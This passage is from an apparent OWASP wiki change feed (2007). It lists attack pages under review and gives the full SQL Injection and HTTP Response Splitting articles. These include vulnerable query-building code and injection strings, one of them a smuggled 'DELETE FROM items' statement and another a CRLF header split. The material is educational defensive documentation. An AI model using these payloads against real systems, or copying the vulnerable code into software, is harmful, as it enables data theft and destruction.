* [[Mobile_code:_non-final_public_field]] - ([http://www.owasp.org/index.php?title=Mobile_code%3A_non-final_public_field&amp;amp;diff=23079&amp;amp;oldid=6036 diff] , [http://www.owasp.org/index.php?title=Mobile_code:_non-final_public_field&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Mobile_code:_object_hijack]] - ([http://www.owasp.org/index.php?title=Mobile_code%3A_object_hijack&amp;amp;diff=23082&amp;amp;oldid=6040 diff] , [http://www.owasp.org/index.php?title=Mobile_code:_object_hijack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Parameter_Delimiter]] - ([http://www.owasp.org/index.php?title=Parameter_Delimiter&amp;amp;diff=23084&amp;amp;oldid=6190 diff] , [http://www.owasp.org/index.php?title=Parameter_Delimiter&amp;amp;action=history history])&lt;br /&gt;
	&lt;br /&gt;
* [[Path_Manipulation]] - ([http://www.owasp.org/index.php?title=Path_Manipulation&amp;amp;diff=22073&amp;amp;oldid=7983 diff] , [http://www.owasp.org/index.php?title=Path_Manipulation&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Path_Traversal]] - ([http://www.owasp.org/index.php?title=Path_Traversal&amp;amp;diff=20667&amp;amp;oldid=18282 diff] , [http://www.owasp.org/index.php?title=Path_Traversal&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Relative_Path_Traversal]] - ([http://www.owasp.org/index.php?title=Relative_Path_Traversal&amp;amp;diff=20873&amp;amp;oldid=6423 diff] , [http://www.owasp.org/index.php?title=Relative_Path_Traversal&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Repudiation_Attack]] - ([http://www.owasp.org/index.php?title=Repudiation_Attack&amp;amp;diff=22728&amp;amp;oldid=7397 diff] , [http://www.owasp.org/index.php?title=Repudiation_Attack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Resource_Injection]] - ([http://www.owasp.org/index.php?title=Resource_Injection&amp;amp;diff=20794&amp;amp;oldid=7980 diff] , [http://www.owasp.org/index.php/Resource_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Server-Side_Includes_%28SSI%29_Injection]] - ([http://www.owasp.org/index.php?title=Server-Side_Includes_%28SSI%29_Injection&amp;amp;diff=20886&amp;amp;oldid=18278 diff] , [http://www.owasp.org/index.php?title=Server-Side_Includes_%28SSI%29_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Session_hijacking_attack]] - ([http://www.owasp.org/index.php?title=Session_hijacking_attack&amp;amp;diff=22733&amp;amp;oldid=6467 diff] , [http://www.owasp.org/index.php?title=Session_hijacking_attack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Setting_Manipulation]] - ([http://www.owasp.org/index.php?title=Setting_Manipulation&amp;amp;diff=22734&amp;amp;oldid=7984 diff] , [http://www.owasp.org/index.php?title=Setting_Manipulation&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Special_Element_Injection]] - ([http://www.owasp.org/index.php?title=Special_Element_Injection&amp;amp;diff=20884&amp;amp;oldid=6447 diff] , [http://www.owasp.org/index.php?title=Special_Element_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Spyware]] - ([http://www.owasp.org/index.php?title=Spyware&amp;amp;diff=22761&amp;amp;oldid=6448 diff] , [http://www.owasp.org/index.php?title=Spyware&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[SQL_Injection]] - ([https://www.owasp.org/index.php?title=SQL_Injection&amp;amp;diff=23119&amp;amp;oldid=21964 diff] , [https://www.owasp.org/index.php?title=SQL_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Traffic_flood]] - ([http://www.owasp.org/index.php?title=Traffic_flood&amp;amp;diff=22775&amp;amp;oldid=7392 diff] , [http://www.owasp.org/index.php?title=Traffic_flood&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Trojan_Horse]] - ([http://www.owasp.org/index.php?title=Trojan_Horse&amp;amp;diff=22756&amp;amp;oldid=7078 diff] , [http://www.owasp.org/index.php?title=Trojan_Horse&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Unicode_Encoding]] - ([http://www.owasp.org/index.php?title=Unicode_Encoding&amp;amp;diff=22729&amp;amp;oldid=7943 diff] , [http://www.owasp.org/index.php?title=Unicode_Encoding&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Web_Parameter_Tampering]] - ([http://www.owasp.org/index.php?title=Web_Parameter_Tampering&amp;amp;diff=20883&amp;amp;oldid=6831 diff] , [http://www.owasp.org/index.php?title=Web_Parameter_Tampering&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
by Przemyslaw 'rezos' Skowron (20071025 - part I - first 50%])&lt;br /&gt;
&lt;br /&gt;
* [[Absolute_Path_Traversal]] - ([http://www.owasp.org/index.php?title=Absolute_Path_Traversal&amp;amp;diff=22637&amp;amp;oldid=14001 diff] , [http://www.owasp.org/index.php?title=Absolute_Path_Traversal&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Argument_Injection_or_Modification]] - ([http://www.owasp.org/index.php?title=Argument_Injection_or_Modification&amp;amp;diff=22638&amp;amp;oldid=5186 diff] , [http://www.owasp.org/index.php?title=Argument_Injection_or_Modification&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Brute_force_attack]] - ([http://www.owasp.org/index.php?title=Brute_force_attack&amp;amp;diff=22641&amp;amp;oldid=13966 diff] , [http://www.owasp.org/index.php?title=Brute_force_attack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Buffer_overflow_attack]] - ([http://www.owasp.org/index.php?title=Buffer_overflow_attack&amp;amp;diff=22642&amp;amp;oldid=7390 diff] , [http://www.owasp.org/index.php?title=Buffer_overflow_attack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Cache_Poisoning]] - ([http://www.owasp.org/index.php?title=Cache_Poisoning&amp;amp;diff=22647&amp;amp;oldid=13172 diff] , [http://www.owasp.org/index.php?title=Cache_Poisoning&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Code_Injection]] - ([http://www.owasp.org/index.php?title=Code_Injection&amp;amp;diff=22651&amp;amp;oldid=7913 diff] , [http://www.owasp.org/index.php?title=Code_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Command_Injection]] - ([http://www.owasp.org/index.php?title=Command_Injection&amp;amp;diff=22654&amp;amp;oldid=16438 diff] , [http://www.owasp.org/index.php?title=Command_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Cross-Site_Request_Forgery]] - ([http://www.owasp.org/index.php?title=Cross-Site_Request_Forgery&amp;amp;diff=22643&amp;amp;oldid=19627 diff] , [http://www.owasp.org/index.php?title=Cross-Site_Request_Forgery&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Cross-User_Defacement]] - ([http://www.owasp.org/index.php?title=Cross-User_Defacement&amp;amp;diff=22658&amp;amp;oldid=7949 diff] , [http://www.owasp.org/index.php?title=Cross-User_Defacement&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Cross-site-scripting]] - ([http://www.owasp.org/index.php?title=Cross-site-scripting&amp;amp;diff=22660&amp;amp;oldid=21443 diff] , [http://www.owasp.org/index.php?title=Cross-site-scripting&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Integer_Overflows/Underflows]] - ([http://www.owasp.org/index.php?title=Integer_Overflows%2FUnderflows&amp;amp;diff=22661&amp;amp;oldid=7380 diff] , [http://www.owasp.org/index.php?title=Integer_Overflows/Underflows&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[XSS_in_error_pages]] - ([http://www.owasp.org/index.php?title=XSS_in_error_pages&amp;amp;diff=22662&amp;amp;oldid=6850 diff] , [http://www.owasp.org/index.php?title=XSS_in_error_pages&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
'''New items'''&lt;br /&gt;
** [[Denial_of_Service]]&lt;br /&gt;
** [[Embedding_Null_Code]]&lt;br /&gt;
** [[Man-in-the-browser_attack]]&lt;br /&gt;
** [[Manipulating_User_Permission_Identifier]]&lt;br /&gt;
** [[Session_Prediction]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
by Przemyslaw 'rezos' Skowron (20071104 - part II - second 50%])&lt;br /&gt;
&lt;br /&gt;
* [[Account_lockout_attack]] - ([http://www.owasp.org/index.php?title=Account_lockout_attack&amp;amp;diff=22954&amp;amp;oldid=6117 diff] , [http://www.owasp.org/index.php?title=Account_lockout_attack&amp;amp;action=history history])&lt;br /&gt;
* [[Alternate_XSS_Syntax]] - ([http://www.owasp.org/index.php?title=Alternate_XSS_Syntax&amp;amp;diff=22956&amp;amp;oldid=16480 diff], [http://www.owasp.org/index.php?title=Alternate_XSS_Syntax&amp;amp;action=history history])&lt;br /&gt;
* [[Asymmetric_resource_consumption_%28amplification%29]] - ([http://www.owasp.org/index.php?title=Asymmetric_resource_consumption_%28amplification%29&amp;amp;diff=22957&amp;amp;oldid=5188 diff], [http://www.owasp.org/index.php?title=Asymmetric_resource_consumption_%28amplification%29&amp;amp;action=history history])&lt;br /&gt;
* [[Blind_SQL_Injection]] - ([http://www.owasp.org/index.php?title=Blind_SQL_Injection&amp;amp;diff=22959&amp;amp;oldid=14497 diff], [http://www.owasp.org/index.php?title=Blind_SQL_Injection&amp;amp;action=history history])&lt;br /&gt;
* [[Blind_XPath_Injection]] - ([http://www.owasp.org/index.php?title=Blind_XPath_Injection&amp;amp;diff=22960&amp;amp;oldid=9579 diff], [http://www.owasp.org/index.php?title=Blind_XPath_Injection&amp;amp;action=history history])&lt;br /&gt;
* [[Comment_Element]] - ([http://www.owasp.org/index.php?title=Comment_Element&amp;amp;diff=22961&amp;amp;oldid=5325 diff], [http://www.owasp.org/index.php?title=Comment_Element&amp;amp;action=history history])&lt;br /&gt;
* [[Cryptanalysis]] - ([http://www.owasp.org/index.php?title=Cryptanalysis&amp;amp;diff=22962&amp;amp;oldid=7389 diff], [http://www.owasp.org/index.php?title=Cryptanalysis&amp;amp;action=history history])&lt;br /&gt;
* [[Custom_Special_Character_Injection]] - ([http://www.owasp.org/index.php?title=Custom_Special_Character_Injection&amp;amp;diff=22963&amp;amp;oldid=5357 diff], [http://www.owasp.org/index.php?title=Custom_Special_Character_Injection&amp;amp;action=history history])&lt;br /&gt;
* [[XPATH_Injection]] - ([http://www.owasp.org/index.php?title=XPATH_Injection&amp;amp;diff=22965&amp;amp;oldid=21461 diff], [http://www.owasp.org/index.php?title=XPATH_Injection&amp;amp;action=history history])&lt;br /&gt;
* [[XSS_using_Script_Via_Encoded_URI_Schemes]] - ([http://www.owasp.org/index.php?title=XSS_using_Script_Via_Encoded_URI_Schemes&amp;amp;diff=22936&amp;amp;oldid=6851 diff], [http://www.owasp.org/index.php?title=XSS_using_Script_Via_Encoded_URI_Schemes&amp;amp;action=history history])&lt;br /&gt;
* [[XSS_using_Script_in_Attributes ]] - ([http://www.owasp.org/index.php?title=XSS_using_Script_in_Attributes&amp;amp;diff=22937&amp;amp;oldid=6852 diff], [http://www.owasp.org/index.php?title=XSS_using_Script_in_Attributes&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
NEW ITEMS - 20071104 (by Przemyslaw 'rezos' Skowron):&lt;br /&gt;
* [[Overflow_Binary_Resource_File]] - ([INITIAL VERSION diff] , [http://www.owasp.org/index.php?title=Overflow_Binary_Resource_File&amp;amp;action=history history])&lt;br /&gt;
* [[Cross_Frame_Scripting]] - ([INITIAL VERSION diff] , [http://www.owasp.org/index.php?title=Cross_Frame_Scripting&amp;amp;action=history history])&lt;br /&gt;
* [[Buffer_Overflow_via_Environment_Variables]] - ([INITIAL VERSION diff] , [http://www.owasp.org/index.php?title=Buffer_Overflow_via_Environment_Variables&amp;amp;action=history history])&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=SQL_Injection&amp;diff=23119</id>
		<title>SQL Injection</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=SQL_Injection&amp;diff=23119"/>
				<updated>2007-11-05T19:36:07Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Attack}}&lt;br /&gt;
An [[SQL injection]] attack consists of insertion or &amp;quot;injection&amp;quot; of an SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. For an introduction to SQL Injection, please refer to the references at the bottom of the page.&lt;br /&gt;
SQL injection attacks are another instantiation of an [[Top 10 2007-Injection Flaws | injection attack]], in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.&lt;br /&gt;
&lt;br /&gt;
SQL injection errors occur when:&lt;br /&gt;
&lt;br /&gt;
# Data enters a program from an untrusted source. &lt;br /&gt;
# The data used to dynamically construct a SQL query &lt;br /&gt;
&lt;br /&gt;
The main consequences are:&lt;br /&gt;
&lt;br /&gt;
* Confidentiality: Since SQL databases generally hold sensitive data, loss of confidentiality is a frequent problem with [[Glossary#SQL Injection|SQL Injection]] vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
* Authentication: If poor SQL commands are used to check user names and passwords, it may be possible to connect to a system as another user with no previous knowledge of the password.&lt;br /&gt;
&lt;br /&gt;
* Authorization: If authorization information is held in an SQL database, it may be possible to change this information through the successful exploitation of an [[Glossary#SQL Injection|SQL Injection]] vulnerability.&lt;br /&gt;
&lt;br /&gt;
* Integrity: Just as it may be possible to read sensitive information, it is also possible to make changes or even delete this information with an [[Glossary#SQL Injection|SQL Injection]] attack.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The platform affected can be:&lt;br /&gt;
&lt;br /&gt;
* Language: SQL&lt;br /&gt;
&lt;br /&gt;
* Platform: Any (requires interaction with an SQL database)&lt;br /&gt;
&lt;br /&gt;
[[Glossary#SQL Injection|SQL Injection]] has become a common issue with database-driven web sites. The flaw is easily detected, and easily exploited, and as such, any site or software package with even a minimal user base is likely to be subject to an attempted attack of this kind. &lt;br /&gt;
&lt;br /&gt;
Essentially, the attack is accomplished by placing a meta character into data input to then place SQL commands in the control plane, which did not exist there before. This flaw depends on the fact that SQL makes no real distinction between the control and data planes.&lt;br /&gt;
&lt;br /&gt;
== Severity ==&lt;br /&gt;
Medium to High&lt;br /&gt;
&lt;br /&gt;
== Likelihood of exploit ==&lt;br /&gt;
Very High&lt;br /&gt;
&lt;br /&gt;
== Examples ==&lt;br /&gt;
&lt;br /&gt;
===Example 1===&lt;br /&gt;
&lt;br /&gt;
In SQL:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
select id, firstname, lastname from authors&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If one provided:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Firstname: evil'ex&lt;br /&gt;
Lastname: Newman&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
the query string becomes:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
select id, firstname, lastname from authors where forename = 'evil'ex' and surname ='newman'&lt;br /&gt;
which the database attempts to run as &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Incorrect syntax near al' as the database tried to execute evil. &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A safe version of the above SQL statement could be coded in Java as:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
String firstname = req.getParameter(&amp;quot;firstname&amp;quot;);&lt;br /&gt;
String lastname = req.getParameter(&amp;quot;lastname&amp;quot;);&lt;br /&gt;
// FIXME: do your own validation to detect attacks&lt;br /&gt;
String query = &amp;quot;SELECT id, firstname, lastname FROM authors WHERE forename = ? and surname = ?&amp;quot;;&lt;br /&gt;
PreparedStatement pstmt = connection.prepareStatement( query );&lt;br /&gt;
pstmt.setString( 1, firstname );&lt;br /&gt;
pstmt.setString( 2, lastname );&lt;br /&gt;
try&lt;br /&gt;
{&lt;br /&gt;
	ResultSet results = pstmt.execute( );&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Example 2===&lt;br /&gt;
&lt;br /&gt;
The following C# code dynamically constructs and executes a SQL query that searches for items matching a specified name. The query restricts the items displayed to those where owner matches the user name of the currently-authenticated user.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
	...&lt;br /&gt;
	string userName = ctx.getAuthenticatedUserName();&lt;br /&gt;
	string query = &amp;quot;SELECT * FROM items WHERE owner = &amp;quot;'&amp;quot; &lt;br /&gt;
					+ userName + &amp;quot;' AND itemname = '&amp;quot;  &lt;br /&gt;
					+ ItemName.Text + &amp;quot;'&amp;quot;;&lt;br /&gt;
	sda = new SqlDataAdapter(query, conn);&lt;br /&gt;
	DataTable dt = new DataTable();&lt;br /&gt;
	sda.Fill(dt);&lt;br /&gt;
	...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The query that this code intends to execute follows:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
	SELECT * FROM items&lt;br /&gt;
	WHERE owner = &lt;br /&gt;
	AND itemname = ;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, because the query is constructed dynamically by concatenating a constant base query string and a user input string, the query only behaves correctly if itemName does not contain a single-quote character. If an attacker with the user name wiley enters the string &amp;quot;name' OR 'a'='a&amp;quot; for itemName, then the query becomes the following:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
	SELECT * FROM items&lt;br /&gt;
	WHERE owner = 'wiley'&lt;br /&gt;
	AND itemname = 'name' OR 'a'='a';&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The addition of the OR 'a'='a' condition causes the where clause to always evaluate to true, so the query becomes logically equivalent to the much simpler query:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
	SELECT * FROM items;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This simplification of the query allows the attacker to bypass the requirement that the query only return items owned by the authenticated user; the query now returns all entries stored in the items table, regardless of their specified owner.&lt;br /&gt;
&lt;br /&gt;
===Example 3===&lt;br /&gt;
&lt;br /&gt;
This example examines the effects of a different malicious value passed to the query constructed and executed in Example 1. If an attacker with the user name hacker enters the string &amp;quot;hacker'); DELETE FROM items; --&amp;quot; for itemName, then the query becomes the following two queries:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
	SELECT * FROM items &lt;br /&gt;
	WHERE owner = 'hacker'&lt;br /&gt;
	AND itemname = 'name';&lt;br /&gt;
&lt;br /&gt;
	DELETE FROM items;&lt;br /&gt;
&lt;br /&gt;
	--'&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Many database servers, including Microsoft® SQL Server 2000, allow multiple SQL statements separated by semicolons to be executed at once. While this attack string results in an error on Oracle and other database servers that do not allow the batch-execution of statements separated by semicolons, on databases that do allow batch execution, this type of attack allows the attacker to execute arbitrary commands against the database.&lt;br /&gt;
&lt;br /&gt;
Notice the trailing pair of hyphens (--), which specifies to most database servers that the remainder of the statement is to be treated as a comment and not executed [19]. In this case the comment character serves to remove the trailing single-quote left over from the modified query. On a database where comments are not allowed to be used in this way, the general attack could still be made effective using a trick similar to the one shown in Example 1. If an attacker enters the string &amp;quot;name'); DELETE FROM items; SELECT * FROM items WHERE 'a'='a&amp;quot;, the following three valid statements will be created:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
	SELECT * FROM items &lt;br /&gt;
	WHERE owner = 'hacker'&lt;br /&gt;
	AND itemname = 'name';&lt;br /&gt;
&lt;br /&gt;
	DELETE FROM items;&lt;br /&gt;
&lt;br /&gt;
	SELECT * FROM items WHERE 'a'='a';&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
One traditional approach to preventing SQL injection attacks is to handle them as an input validation problem and either accept only characters from a whitelist of safe values or identify and escape a blacklist of potentially malicious values. Whitelisting can be a very effective means of enforcing strict input validation rules, but parameterized SQL statements require less maintenance and can offer more guarantees with respect to security. As is almost always the case, blacklisting is riddled with loopholes that make it ineffective at preventing SQL injection attacks. For example, attackers can:&lt;br /&gt;
&lt;br /&gt;
* Target fields that are not quoted &lt;br /&gt;
* Find ways to bypass the need for certain escaped meta-characters &lt;br /&gt;
* Use stored procedures to hide the injected meta-characters &lt;br /&gt;
&lt;br /&gt;
Manually escaping characters in input to SQL queries can help, but it will not make your application secure from SQL injection attacks.&lt;br /&gt;
&lt;br /&gt;
Another solution commonly proposed for dealing with SQL injection attacks is to use stored procedures. Although stored procedures prevent some types of SQL injection attacks, they fail to protect against many others. For example, the following PL/SQL procedure is vulnerable to the same SQL injection attack shown in the first example.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
	procedure get_item (&lt;br /&gt;
		itm_cv IN OUT ItmCurTyp,&lt;br /&gt;
		usr in varchar2,&lt;br /&gt;
		itm in varchar2)&lt;br /&gt;
	is&lt;br /&gt;
		open itm_cv for ' SELECT * FROM items WHERE ' ||&lt;br /&gt;
				'owner = '''|| usr || &lt;br /&gt;
				' AND itemname = ''' || itm || '''';&lt;br /&gt;
	end get_item;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Stored procedures typically help prevent SQL injection attacks by limiting the types of statements that can be passed to their parameters. However, there are many ways around the limitations and many interesting statements that can still be passed to stored procedures. Again, stored procedures can prevent some exploits, but they will not make your application secure against SQL injection attacks.&lt;br /&gt;
&lt;br /&gt;
== External References ==&lt;br /&gt;
&lt;br /&gt;
*[http://www.greensql.net/ GreenSQL Open Source SQL Injection Filter]&lt;br /&gt;
* [[Injection problem]]&lt;br /&gt;
* [[Avoiding SQL Injection]]&lt;br /&gt;
* [[Testing for SQL Injection]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related Threats==&lt;br /&gt;
&lt;br /&gt;
[[:Category:Command Execution]] &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related Attacks==&lt;br /&gt;
&lt;br /&gt;
*[[Blind SQL Injection]]&lt;br /&gt;
&lt;br /&gt;
*[[Code Injection]]&lt;br /&gt;
&lt;br /&gt;
*[[Double Encoding]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related Vulnerabilities==&lt;br /&gt;
&lt;br /&gt;
*[[:Category:Input Validation Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related Countermeasures==&lt;br /&gt;
&lt;br /&gt;
Avoidance and mitigation &lt;br /&gt;
&lt;br /&gt;
* Requirements specification: A non-SQL style database which is not subject to this flaw may be chosen.&lt;br /&gt;
&lt;br /&gt;
* Implementation: Use vigorous white-list style checking on any user input that may be used in an SQL command. Rather than escape meta-characters, it is safest to disallow them entirely. Reason: Later use of data that has been entered in the database may neglect to escape meta-characters before use.&lt;br /&gt;
&lt;br /&gt;
* [[Image:Advanced Topics on SQL Injection Protection.ppt]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Credit ==&lt;br /&gt;
&lt;br /&gt;
{{Template:SecureSoftware}}&lt;br /&gt;
{{Template:Fortify}}&lt;br /&gt;
&lt;br /&gt;
[[Category:Injection Attack]]&lt;br /&gt;
[[category:Attack]]&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=HTTP_Response_Splitting&amp;diff=23117</id>
		<title>HTTP Response Splitting</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=HTTP_Response_Splitting&amp;diff=23117"/>
				<updated>2007-11-05T19:25:17Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Attack}}&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
HTTP response splitting vulnerabilities occur when:&lt;br /&gt;
&lt;br /&gt;
* Data enters a web application through an untrusted source, most frequently an HTTP request. &lt;br /&gt;
* The data is included in an HTTP response header sent to a web user without being validated for malicious characters. &lt;br /&gt;
&lt;br /&gt;
As with many software security vulnerabilities, HTTP response splitting is a means to an end, not an end in itself. At its root, the vulnerability is straightforward: an attacker passes malicious data to a vulnerable application, and the application includes the data in an HTTP response header.&lt;br /&gt;
&lt;br /&gt;
To mount a successful exploit, the application must allow input that contains CR (carriage return, also given by %0d or \r) and LF (line feed, also given by %0a or \n)characters into the header. These characters not only give attackers control of the remaining headers and body of the response the application intends to send, but also allows them to create additional responses entirely under their control.&lt;br /&gt;
&lt;br /&gt;
== Severity ==&lt;br /&gt;
High &lt;br /&gt;
&lt;br /&gt;
== Likelihood of exploitation ==&lt;br /&gt;
Medium&lt;br /&gt;
&lt;br /&gt;
==Examples ==&lt;br /&gt;
&lt;br /&gt;
The following code segment reads the name of the author of a weblog entry, author, from an HTTP request and sets it in a cookie header of an HTTP response.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
	String author = request.getParameter(AUTHOR_PARAM);&lt;br /&gt;
	...&lt;br /&gt;
	Cookie cookie = new Cookie(&amp;quot;author&amp;quot;, author);&lt;br /&gt;
        cookie.setMaxAge(cookieExpiration);&lt;br /&gt;
        response.addCookie(cookie);&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Assuming a string consisting of standard alpha-numeric characters, such as &amp;quot;Jane Smith&amp;quot;, is submitted in the request the HTTP response including this cookie might take the following form:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
	HTTP/1.1 200 OK&lt;br /&gt;
	...&lt;br /&gt;
	Set-Cookie: author=Jane Smith&lt;br /&gt;
	...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, because the value of the cookie is formed of unvalidated user input the response will only maintain this form if the value submitted for AUTHOR_PARAM does not contain any CR and LF characters. If an attacker submits a malicious string, such as &amp;quot;Wiley Hacker\r\nHTTP/1.1 200 OK\r\n...&amp;quot;, then the HTTP response would be split into two responses of the following form:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
	HTTP/1.1 200 OK&lt;br /&gt;
	...&lt;br /&gt;
	Set-Cookie: author=Wiley Hacker&lt;br /&gt;
	&lt;br /&gt;
	HTTP/1.1 200 OK&lt;br /&gt;
	...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Clearly, the second response is completely controlled by the attacker and can be constructed with any header and body content desired. The ability of attacker to construct arbitrary HTTP responses permits a variety of resulting attacks, including: cross-user defacement, web and browser cache poisoning, cross-site scripting and page hijacking.&lt;br /&gt;
&lt;br /&gt;
==External References==&lt;br /&gt;
&lt;br /&gt;
http://www.infosecwriters.com/text_resources/pdf/HTTP_Response.pdf - HTTP Response Spliting&lt;br /&gt;
&lt;br /&gt;
http://www.securiteam.com/securityreviews/5WP0E2KFGK.html - Introdution to HTTP Response Spliting&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related Threats==&lt;br /&gt;
&lt;br /&gt;
[[Client-side attacks]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related Attacks==&lt;br /&gt;
&lt;br /&gt;
*[[Cross-User Defacement]]&lt;br /&gt;
*[[Cache Poisoning]]&lt;br /&gt;
*[[Cross-Site Scripting]]&lt;br /&gt;
*[[Page Hijacking]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related Vulnerabilities==&lt;br /&gt;
&lt;br /&gt;
[[:Category:Input Validation Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related Countermeasures==&lt;br /&gt;
&lt;br /&gt;
[[:Category:Input Validation]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Credit==&lt;br /&gt;
&lt;br /&gt;
{{Template:Fortify}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category: Protocol Manipulation]]&lt;br /&gt;
&lt;br /&gt;
[[Category: Attack]]&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=HTTP_Response_Splitting&amp;diff=23115</id>
		<title>HTTP Response Splitting</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=HTTP_Response_Splitting&amp;diff=23115"/>
				<updated>2007-11-05T18:57:09Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: &lt;/p&gt;
&lt;hr /&gt;
